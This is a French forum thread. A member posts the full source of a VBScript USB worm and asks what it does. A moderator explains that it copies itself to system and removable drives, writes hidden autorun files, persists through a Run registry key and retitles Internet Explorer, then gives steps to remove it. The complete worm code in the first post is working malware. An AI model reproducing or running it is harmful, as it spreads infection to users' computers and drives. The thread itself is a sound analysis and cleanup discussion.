Razi3L
Admin
Nombre de messages : 998
Age : 38
Localisation : DTC
Fonction : Maître Suprême
Hobbie : La Tyranie
Date d'inscription : 13/06/2006
Feuille de personnage
LVL:
    (3/10)
Pts de destin: 1
XP force: 3
 |  Sujet: J'ai besion de toi Scratt  Ven 25 Mai - 2:03 | |
| Ce vbs fait quoi? A quoi il sert? C'est une menace? - Code:
-
'My name is Slow but sure V0.05
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Godzilla"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
| |
|
Crash.8
Modos
Nombre de messages : 1382
Age : 40
Localisation : Sur Terre
Fonction : Ma fonction actuelle
Hobbie : Mes hobbies bien sur..... programmer
Date d'inscription : 22/06/2006
Feuille de personnage
LVL:
(2/10)
Pts de destin: 1
XP force: 1
| | Sujet: Re: J'ai besion de toi Scratt Ven 25 Mai - 5:15 | |
| C'est un petit virus..... je dirai mieux un parasite de mer*eVoici ce qu'il fait en détail : - il commence par se copier dans "c:\windows\system32" sous le nom de "MS32DLL.dll.vbs" en attribut archive - il se copie aussi sur tous les lecteurs amovibles (clé USB) et lecteurs fixes (disque dur) dans la racine en attribut caché - il ajoute à ces lecteurs un fichier "autorun.ini", en attribut caché, qui permet de le lancer lors qu'on ouvre le lecteur en question - il ajoute dans le registre une entrée pour le lancer au démarrage sous le nom "MS32DLL" - il change le titre de IE en mettant à la place "Hacked by Godzilla" - si le disque qui la éxecuterest un lecteur fixe, il attend 200s puis recommence la copie dans les lecteurs amovible sinon il se relance..... Voilà.... j'espére que tu ne là pas lancer.....   c'est bizarre mais il ressemble à l'article que j'avais mit làPour s'en débarraser : - supprimer le fichier "MS32DLL.dll.vbs" dans "c:\windows\system32" - exécuter "msconfig" pour enlever le programme au démarrage - ecrire dans le regitre à la clé "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title" = "Windows Internet Explorer" ou autre chose au choix - et biensur, déactiver le lancement automatique des clés USB - et afficher les fichiers cachées pour le supprimer sur les clés.... Sinon les antivirus doivent le connaître....  | |
|
Razi3L
Admin
Nombre de messages : 998
Age : 38
Localisation : DTC
Fonction : Maître Suprême
Hobbie : La Tyranie
Date d'inscription : 13/06/2006
Feuille de personnage
LVL:
(3/10)
Pts de destin: 1
XP force: 3
| | Sujet: Re: J'ai besion de toi Scratt Ven 25 Mai - 7:37 | |
| | |
|
Crash.8
Modos
Nombre de messages : 1382
Age : 40
Localisation : Sur Terre
Fonction : Ma fonction actuelle
Hobbie : Mes hobbies bien sur..... programmer
Date d'inscription : 22/06/2006
Feuille de personnage
LVL:
(2/10)
Pts de destin: 1
XP force: 1
| |
Admin
Admin
Nombre de messages : 1534
Age : 39
Localisation : Ici et nul part ailleurs
Fonction : Admin tout puissant
Hobbie : Faire chier tout le monde ! Niak !
Date d'inscription : 04/06/2006
Feuille de personnage
LVL:
(2/10)
Pts de destin: 1
XP force: 2
| | Sujet: Re: J'ai besion de toi Scratt Lun 28 Mai - 16:03 | |
|  Mais il fait quoi exactement ce truc ?! J'espère que je l'ai pas moi... Je suis une des sources mère d'information net du barbare et j'ai toujours des pages qui s'ouvent toute seule maintenant quand je suis sur le net...  Je sais pas si c'est 2 trucs sont lié mais je me pose des questions... la prochaine fois que t'es sur g*** pourras(tu passer me faire une bonne mise à jour de mon anti virus et un bon nettoyage des fichiers inutiles etc etc etc ?! please  | |
|
Razi3L
Admin
Nombre de messages : 998
Age : 38
Localisation : DTC
Fonction : Maître Suprême
Hobbie : La Tyranie
Date d'inscription : 13/06/2006
Feuille de personnage
LVL:
(3/10)
Pts de destin: 1
XP force: 3
| | Sujet: Re: J'ai besion de toi Scratt Mar 29 Mai - 1:42 | |
| t'inkiet, je ne te l'ai pas filé. Je connais le traitre qui véhicule cette m***e | |
|
Crash.8
Modos
Nombre de messages : 1382
Age : 40
Localisation : Sur Terre
Fonction : Ma fonction actuelle
Hobbie : Mes hobbies bien sur..... programmer
Date d'inscription : 22/06/2006
Feuille de personnage
LVL:
(2/10)
Pts de destin: 1
XP force: 1
| | Sujet: Re: J'ai besion de toi Scratt Mar 29 Mai - 2:46 | |
| Tryskell, se qu'il fait le lait expliquer... il se copie juste de clé USB en clé USB, et affiche Hacked by Godzilla dans IE...... c'est pas mortel mais chiant..... Je te ferais un bon nettoyage ma petite Tryskell adorée.... | |
|
Contenu sponsorisé
| | Sujet: Re: J'ai besion de toi Scratt | |
| |
|
